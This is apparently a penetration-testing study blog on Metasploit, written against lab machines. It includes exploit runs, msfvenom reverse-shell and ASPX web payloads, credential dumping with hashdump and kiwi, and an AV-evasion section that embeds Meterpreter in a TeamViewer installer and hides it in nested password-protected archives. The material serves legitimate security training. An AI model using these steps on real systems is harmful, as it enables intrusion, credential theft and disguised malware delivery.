Introduction
Metasploit is a modular penetration testing framework that lets you enumerate, exploit, and manage access using a single console. The framework provides thousands of modules, payloads, and helpers, which can save time when used with discipline. This post blends theory and commands to help you use Metasploit as a tool, not a crutch.
The core idea is simple: use Metasploit to validate real vulnerabilities, not to replace your understanding of the system. A tool can give you a shell, but only your analysis decides which module is safe, relevant, and appropriate. If you treat the framework as a workflow engine, it becomes both efficient and transparent.
Mindset and Tool Discipline
Tools can create tunnel vision, and that is a risk in real assessments. Time is always limited, so you must prioritize findings that matter and are easy for clients to fix. Keep your ego out of the workflow and focus on verification and evidence.
Key reminders that keep your testing grounded:
- Tools are helpers, not a replacement for protocol knowledge.
- The goal is validated risk, not impressive output.
- Every module has side effects and leaves traces.
Framework Layout and MSFconsole
Metasploit is organized into modules, plugins, scripts, and tools, and each area has a specific purpose. Knowing where things live helps you troubleshoot, extend the framework, and avoid confusion during long sessions. This also helps when you install custom modules or plugins.
# Modules, plugins, scripts, and tools
ls /usr/share/metasploit-framework/modules
ls /usr/share/metasploit-framework/plugins
ls /usr/share/metasploit-framework/scripts
ls /usr/share/metasploit-framework/tools
The entry point is msfconsole, which gives you a central shell for search, exploit configuration, and session handling. Use -q to suppress the banner and start with a clean prompt. The help command is your shortcut to every internal feature. Keep it close, especially when you forget syntax or options.
msfconsole
msfconsole -q
help
Reading Nmap Output for Better Searches
Enumeration is only useful if it leads to the right module search. A common mistake is to search for generic service names instead of the actual application. Nmap output often contains three valuable clues: the service, the server header, and the application title.
Here is a pattern you can use to guide your searches:
- SERVICE / VERSION tells you the protocol and platform context.
- http-title often reveals the actual application name to search.
- http-server-header helps you confirm the backend stack.
PORT STATE SERVICE VERSION
5000/tcp open http Microsoft HTTPAPI httpd 2.0
|_http-title: FortiLogger | Log and Report System
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows
If the title shows FortiLogger, search for that exact product name in Metasploit or Exploit-DB. Searching for “http” or “iis” alone usually produces the wrong results. This mindset saves time and makes your module choice more accurate.
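As an added example (not part of the original notes), here is the same extraction done programmatically from Nmap's XML output (-oX), which is also the format db_import consumes. The sample XML is constructed to mirror the FortiLogger snippet above plus two more ports; the helper names and the rule for turning an http-title into a product name are my own assumptions, not Metasploit functionality:

```ruby
require 'rexml/document'

# Constructed sample of `nmap -sV -oX` output with the http-title and
# http-server-header NSE scripts; not a real scan. The first port mirrors
# the FortiLogger snippet in the text.
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun>
    <host>
      <address addr="10.10.10.40" addrtype="ipv4"/>
      <ports>
        <port protocol="tcp" portid="5000">
          <state state="open"/>
          <service name="http" product="Microsoft HTTPAPI httpd" version="2.0" ostype="Windows"/>
          <script id="http-title" output="FortiLogger | Log and Report System"/>
          <script id="http-server-header" output="Microsoft-IIS/10.0"/>
        </port>
        <port protocol="tcp" portid="21">
          <state state="open"/>
          <service name="ftp" product="Microsoft ftpd" ostype="Windows"/>
        </port>
        <port protocol="tcp" portid="8080">
          <state state="open"/>
          <service name="http"/>
        </port>
      </ports>
    </host>
  </nmaprun>
XML

# "FortiLogger | Log and Report System" -> "FortiLogger". Assumption: the
# product name is the first segment before a ' | ', ' - ' or ' : ' separator.
def title_to_product(title)
  title.split(/\s+[|\-:]\s+/).first.to_s.strip
end

# Walk every open port and decide what to type into `search`. Priority:
# http-title (names the application) > service product string. A bare
# service name such as "http" is deliberately NOT turned into a query.
def nmap_search_terms(xml)
  doc = REXML::Document.new(xml)
  results = []
  REXML::XPath.each(doc, '//host/ports/port') do |port|
    next unless port.elements['state']&.attributes&.[]('state') == 'open'
    svc = port.elements['service']
    scripts = {}
    port.elements.each('script') { |s| scripts[s.attributes['id']] = s.attributes['output'] }

    product = svc&.attributes&.[]('product')
    term = scripts['http-title'] ? title_to_product(scripts['http-title']) : product
    platform = svc&.attributes&.[]('ostype')&.downcase

    entry = {
      port: port.attributes['portid'].to_i,
      service: svc&.attributes&.[]('name'),
      header: scripts['http-server-header'],
      term: term,
      query: nil
    }
    if term && !term.empty?
      entry[:query] = "search #{term}"
      entry[:query] += " platform:#{platform}" if platform
    else
      entry[:note] = 'no product or title: enumerate further before searching'
    end
    results << entry
  end
  results
end

if $PROGRAM_NAME == __FILE__
  nmap_search_terms(SAMPLE_NMAP_XML).each do |e|
    puts "#{e[:port]}/#{e[:service]} -> #{e[:query] || e[:note]}"
  end
end
```

Run it against a real scan with nmap -sV --script http-title,http-server-header -oX scan.xml and feed the file to nmap_search_terms. The point of the nil query for port 8080 is the one made above: "http" alone is not a search term, it is a signal that enumeration is not finished.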
Module Discovery and Execution Flow
Modules are organized by type, OS, service, and name, which helps you understand what they do before you run them. This structure makes it easier to filter searches and pick safer modules. The most common types are auxiliary, exploit, payload, post, and encoder.
The search system accepts filters like type, platform, rank, and CVE. Use show options to see required fields, and info to read the module notes and reliability details. Always set RHOSTS and LHOST explicitly to avoid silent mistakes.
help search
search eternalromance
search eternalromance type:exploit
search type:exploit platform:windows cve:2021 rank:excellent microsoft
use exploit/windows/smb/ms17_010_psexec
show options
info
set RHOSTS 10.10.10.40
setg LHOST 10.10.14.15
run
A module is only as good as its configuration, so read the options carefully. The setg command sets a value globally, so it survives switching modules; use it for values that stay constant across the engagement, such as LHOST, and plain set for module-specific values. If a module has multiple targets, check them before you run the exploit.
show targets
set target 6
Targets and Payload Strategy
Targets map an exploit to a specific OS version or configuration. If you select the wrong target, the exploit can fail or crash the service. Use show targets and match it to your enumeration data. When in doubt, test a safer target or use automatic selection.
Payloads define what happens after exploitation, and Metasploit groups them into singles, stagers, and stages. Singles are self-contained, so they are stable but larger because everything ships in one blob. Stagers are small and only establish the connection; the stage, such as Meterpreter, is then sent over that connection once the stager calls back.
Common payload selection flow:
- Use show payloads to see compatible options.
- Filter with grep for platform and connection type.
- Use set payload <index> after choosing the exploit.
show payloads
grep meterpreter show payloads
grep meterpreter grep reverse_tcp show payloads
set payload 15
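An added example, not from the original notes: a small Ruby helper that parses payload names the way the framework names them (a staged payload writes stage and stager as two path components, windows/meterpreter/reverse_tcp, while a stageless single joins them with an underscore, windows/meterpreter_reverse_tcp), filters a listing the way chained grep does, and checks that multi/handler is configured with exactly the payload msfvenom built. The listing is a constructed excerpt in the shape of show payloads output and every function name is my own:

```ruby
# Constructed excerpt in the shape of `show payloads` / `msfvenom -l payloads`
# output (names only); not a real listing.
PAYLOAD_LISTING = <<~LIST
  windows/meterpreter/reverse_tcp
  windows/meterpreter/reverse_https
  windows/meterpreter_reverse_tcp
  windows/x64/meterpreter/reverse_tcp
  windows/x64/meterpreter_reverse_https
  windows/shell/reverse_tcp
  windows/shell_reverse_tcp
  windows/shell/bind_tcp
  linux/x86/meterpreter/reverse_tcp
  linux/x64/shell_reverse_tcp
  generic/shell_reverse_tcp
LIST

ARCHES = %w[x86 x64 aarch64 armle armbe mipsle mipsbe ppc].freeze

# Decompose a payload path. Two shapes exist:
#   platform[/arch]/<stage>/<stager>   e.g. windows/meterpreter/reverse_tcp  (staged)
#   platform[/arch]/<stage>_<stager>   e.g. windows/meterpreter_reverse_tcp  (single/stageless)
# The only visible difference is the separator before the connection part.
# arch is nil when the name carries none (the module default, x86 on Windows).
def parse_payload(name)
  parts = name.split('/')
  platform = parts.shift
  arch = ARCHES.include?(parts.first) ? parts.shift : nil
  if parts.length == 2
    stage, connector, kind = parts[0], parts[1], :staged
  elsif parts.length == 1 && parts[0].include?('_')
    stage, connector = parts[0].split('_', 2)
    kind = :single
  else
    raise ArgumentError, "unrecognised payload name: #{name}"
  end
  direction, transport = connector.split('_', 2)
  { name: name, platform: platform, arch: arch, kind: kind, stage: stage,
    connector: connector, direction: direction, transport: transport }
end

# Equivalent of `grep meterpreter grep reverse_tcp show payloads`, but each
# keyword must match a parsed field rather than any substring of the name.
def filter_payloads(listing, **want)
  listing.lines.map(&:strip).reject(&:empty?).map { |n| parse_payload(n) }
         .select { |p| want.all? { |k, v| p[k] == v } }
         .map { |p| p[:name] }
end

# The handler must be set to the *same* payload name msfvenom built: a staged
# handler waits to push a stage that a stageless binary will never ask for,
# and an x86 stage injected into an x64 process dies on arrival. Returns nil
# when they match, otherwise the first differing field.
def handler_mismatch(venom_name, handler_name)
  a, b = parse_payload(venom_name), parse_payload(handler_name)
  return nil if a[:name] == b[:name]
  %i[kind arch platform stage transport direction].each do |f|
    return "#{f}: msfvenom=#{a[f].inspect} handler=#{b[f].inspect}" if a[f] != b[f]
  end
  "names differ: #{venom_name} vs #{handler_name}"
end

# msfconsole lines for a listener that matches a generated payload.
def handler_commands(name, lhost, lport)
  parse_payload(name) # rejects malformed names before they reach the console
  ['use multi/handler', "set payload #{name}", "set LHOST #{lhost}",
   "set LPORT #{lport}", 'exploit -j']
end

if $PROGRAM_NAME == __FILE__
  puts filter_payloads(PAYLOAD_LISTING, platform: 'windows', stage: 'meterpreter',
                                        connector: 'reverse_tcp')
  puts handler_mismatch('windows/meterpreter_reverse_tcp', 'windows/meterpreter/reverse_tcp')
  puts handler_commands('windows/meterpreter/reverse_tcp', '10.10.14.5', 1337)
end
```

The mismatch check is the one worth keeping in your own tooling: a handler that accepts the connection and then hangs is almost always a staged/stageless or x86/x64 disagreement between the msfvenom -p value and set payload.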
Meterpreter Interaction and Navigation
Meterpreter is a memory-resident payload that provides a powerful post-exploitation interface. It is loaded by reflective DLL injection, so the stage never has to touch disk, and its transport is encrypted. You should still plan for logs and process telemetry: the host process, its outbound connection, and whatever dropped or launched the stager are all visible to endpoint monitoring.
Once you land a session, use help to explore available commands. Start with navigation and context checks like getuid and sysinfo. If you need a native shell, use shell to drop into the OS CLI.
help
getuid
cd Users
ls
shell
Encoders, MSFvenom, and AV Reality
Encoders change the payload shape to avoid bad characters and improve delivery. They are not a reliable bypass for modern AV on their own and should not be treated as stealth. If you need to test detection, use a service like VirusTotal with a dedicated API key and follow your engagement rules.
MSFvenom is the payload generator used outside the console. You can create raw shellcode, executables, and web payloads, then deliver them through the path you control. The goal is functional delivery, not flashy obfuscation.
# Raw payload
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl
# Encoded payload
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
# Choose encoder in msfconsole
msf6 > show encoders
# Submit to VirusTotal (only with permission)
msf-virustotal -k <API key> -f TeamViewerInstall.exe
Database and Workspace Management
Metasploit can store scan results, services, and credentials in a PostgreSQL database. This helps you avoid repeating scans and keeps evidence centralized. Always initialize the database and verify connectivity before starting a large engagement.
The key commands are simple: check PostgreSQL, initialize msfdb, and then run msfconsole with database support. You can import Nmap XML data, run db-aware scans, and export results for backup. Keep the database tidy so your searches stay meaningful.
sudo service postgresql status
sudo systemctl start postgresql
sudo msfdb init
sudo msfdb run
workspace
workspace -a Target_1
workspace Target_1
workspace -h
# Import and scan
db_import Target.xml
db_nmap -sV -sS 10.10.10.8
# Review and export
hosts
services
creds -h
loot -h
db_export -f xml backup.xml
Sessions and Jobs Management
Sessions are the live channels you control after exploitation. You can background them with CTRL+Z or background, then return to them with sessions -i. This lets you keep multiple footholds alive while you explore other modules.
Jobs are background tasks that keep running even when you switch modules. Use exploit -j to run handlers or scans without blocking your console. You can list jobs, stop them, or kill them all if a port is stuck.
# Sessions
sessions
sessions -i 1
background
# Jobs
jobs -h
exploit -j
jobs -l
jobs -k 0
jobs -K
End-to-End Example Workflow
A clean workflow starts with enumeration, then moves to exploitation, and ends with post-exploitation checks. This example uses FTP and a web root to trigger a Meterpreter payload, then escalates locally. Adapt the flow to your target and avoid assumptions about versions.
# Recon
nmap -sV -T4 -p- 10.10.10.5
# FTP access and upload
ftp 10.10.10.5
ls
# Generate an ASPX payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx
# Handler setup
msfconsole -q
use multi/handler
set LHOST 10.10.14.5
set LPORT 1337
run
# Post exploitation flow (session IDs below come from `sessions -l`; use your own)
search local_exploit_suggester
use post/multi/recon/local_exploit_suggester
set SESSION 2
run
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 3
set LHOST tun0
set LPORT 1338
run
getuid
hashdump
# lsa_dump_sam and lsa_dump_secrets are kiwi extension commands, so load it first
load kiwi
lsa_dump_sam
lsa_dump_secrets
Plugins and Custom Modules
Plugins extend msfconsole with external integrations and extra automation. If a plugin is present in the default directory, you can load it at any time. Keep plugins updated and only load what you need to reduce noise.
Custom modules let you extend Metasploit with your own exploits or ported code from public sources. The main task is placing the file in the correct path and ensuring the naming convention is clean. You can use loadpath or reload_all to force msfconsole to recognize new modules.
# Plugin management
ls /usr/share/metasploit-framework/plugins
load nessus
nessus_help
# Custom module install example
cp ~/Downloads/9861.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/nagios3_command_injection.rb
loadpath /usr/share/metasploit-framework/modules/
reload_all
use exploit/unix/webapp/nagios3_command_injection
If you plan to write your own modules, study Ruby mixins and reuse existing module structures. The core pattern is a class that inherits from Msf::Exploit::Remote, includes mixins, and registers options. Once the module loads, it behaves like any other Metasploit module. This is a good way to standardize custom exploits across a team.
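As an added example rather than code from the notes or the framework, here is an illustrative module skeleton embedded as a string (it targets no real product), a helper that turns an install path under modules/ into the string you pass to use, and a structural lint you can run on a ported .rb before copying it into the tree. The function names, the lint rules and the sample module are my assumptions; the real authority on whether a module loads is reload_all:

```ruby
# Constructed minimal module source in the shape a ported exploit takes
# (class, mixin, metadata, options, check, exploit). Illustrative only.
MODULE_SOURCE = <<~'RUBY'
  class MetasploitModule < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
      super(
        update_info(
          info,
          'Name' => 'Example App Command Injection',
          'Description' => 'Illustrative skeleton; not a real exploit.',
          'Author' => ['team'],
          'License' => MSF_LICENSE,
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Targets' => [['Automatic', {}]],
          'DefaultTarget' => 0
        )
      )
      register_options([OptString.new('TARGETURI', [true, 'Base path', '/'])])
    end

    def check
      res = send_request_cgi('uri' => normalize_uri(target_uri.path))
      res && res.code == 200 ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe
    end

    def exploit
      send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'POST',
                       'vars_post' => { 'cmd' => payload.encoded })
    end
  end
RUBY

# Directory under modules/ -> prefix used by `use` (exploits/ becomes exploit/, etc.).
MODULE_DIRS = {
  'exploits' => 'exploit', 'auxiliary' => 'auxiliary', 'post' => 'post',
  'payloads' => 'payload', 'encoders' => 'encoder', 'nops' => 'nop', 'evasion' => 'evasion'
}.freeze

# ".../modules/exploits/unix/webapp/foo.rb" -> "exploit/unix/webapp/foo"
def module_reference(install_path)
  rel = install_path.split('/modules/', 2).last
  type_dir, *rest = rel.split('/')
  type = MODULE_DIRS.fetch(type_dir) { raise ArgumentError, "unknown module type dir: #{type_dir}" }
  ([type] + rest).join('/').sub(/\.rb\z/, '')
end

# Static sanity checks before copying a ported module into the tree. Returns a
# list of problems (empty means "looks loadable"). Structural checks only.
def lint_module(install_path, source)
  problems = []
  type = begin
    module_reference(install_path).split('/').first
  rescue ArgumentError => e
    problems << e.message
    nil
  end
  base = File.basename(install_path)
  problems << "file name #{base} must be lowercase snake_case ending in .rb" unless base.match?(/\A[a-z0-9_]+\.rb\z/)
  problems << 'missing `class MetasploitModule < Msf::...`' unless source.match?(/^\s*class MetasploitModule < Msf::/)
  problems << 'missing `def initialize` with update_info metadata' unless source.match?(/def initialize/) && source.include?('update_info')
  case type
  when 'exploit'
    problems << 'exploit module without `def exploit`' unless source.match?(/^\s*def exploit\b/)
    problems << 'exploit module without `Rank`' unless source.match?(/^\s*Rank = /)
    problems << 'no `def check`: operators cannot validate before firing' unless source.match?(/^\s*def check\b/)
  when 'auxiliary', 'post'
    problems << "#{type} module without `def run`" unless source.match?(/^\s*def run\b/)
  end
  problems
end

if $PROGRAM_NAME == __FILE__
  path = '/usr/share/metasploit-framework/modules/exploits/unix/webapp/example_cmd_injection.rb'
  puts "use #{module_reference(path)}"
  puts(lint_module(path, MODULE_SOURCE).empty? ? 'ok' : lint_module(path, MODULE_SOURCE))
end
```

Wire lint_module into whatever you use to stage modules for the team: a bad file name or a missing check method is cheap to catch before the copy, and expensive to debug once reload_all silently skips the file.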
IDS-IPS and Evasion Notes
Firewalls filter connections, while IDS and IPS inspect traffic for known patterns. An IDS alerts, while an IPS can block your source, so repeated scans can quickly lock you out. This is why quiet timing, precise targeting, and staged workflows matter.
Metasploit encrypts Meterpreter traffic with AES and keeps the payload in memory, which defeats some signature-based network detection. The larger risk is the payload file before execution, which AV can scan. One mitigation is to embed the payload into a legitimate executable with the msfvenom -x (template) and -k (keep the template's behaviour) options, so the file no longer looks like a bare msfvenom binary. Another is to deliver it inside a password-protected archive, which stops scanners from inspecting the contents in transit; the file is still scanned on extraction and execution, so this only moves the problem.
# Template injection example (-x template binary, -k keep its original behaviour, -i encoder iterations)
msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
# Archive and double-archive approach (-p prompts for a password; nesting a second time hides even the inner archive's file listing)
wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
rar a test.rar -p test.js
mv test.rar test
rar a test2.rar -p test
mv test2.rar test2
Reference
This article is based on my personal study notes from the Information Security Foundations track.
Full repository: https://github.com/lameiro0x/pentesting-path-htb